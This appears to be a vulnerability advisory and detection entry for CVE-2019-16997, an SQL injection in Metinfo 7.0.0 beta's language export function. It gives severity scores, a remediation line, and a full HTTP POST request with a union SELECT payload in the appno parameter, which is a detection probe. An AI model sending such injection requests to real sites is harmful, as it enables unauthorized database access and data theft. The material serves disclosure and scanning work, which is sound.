| Title | Metinfo 7.0.0 beta - SQL Injection |
|---|---|
| Author | ritikchaddha |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. |
| Remediation | Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability. |
| CVSS Score | 7.2 |
| EPSS Score | 0.93646 |
| CVE ID | CVE-2019-16997 |
| CWE ID | CWE-89 |
| Tags | cve cve2019 metinfo sqli vuln |
Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/language/admin/language_general.class.php via the admin/?n=language&c=language_general&a=doExportPack appno parameter.
POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Content-Length: 55
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
appno= 1 union SELECT 98989*443131,1&editor=cn&site=web
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-16997.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-16997.pcap
N/AN/A